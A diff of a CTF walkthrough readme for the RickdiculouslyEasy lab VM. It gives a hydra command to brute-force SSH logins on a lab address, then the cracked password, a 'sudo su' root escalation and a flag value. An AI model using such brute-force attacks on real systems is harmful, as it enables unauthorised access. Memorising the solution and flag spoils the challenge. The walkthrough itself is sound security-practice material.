keerthiprabup/VM/RickdiculouslyEasy/readme.md

 Bruteforce the password list on the ssh server using the username RickSanchez using $hydra command:

     $ hydra -l RickSanchez -P yourfile.txt 192.168.42.8 ssh  -s  22222
-The password is:
+The password is: P7Curtains

-flag root access:
+Use the command $sudo su to switch to root terminal

+We get file containing the flag!
 ### 9.FLAG: {Ionic Defibrillator} - 30 points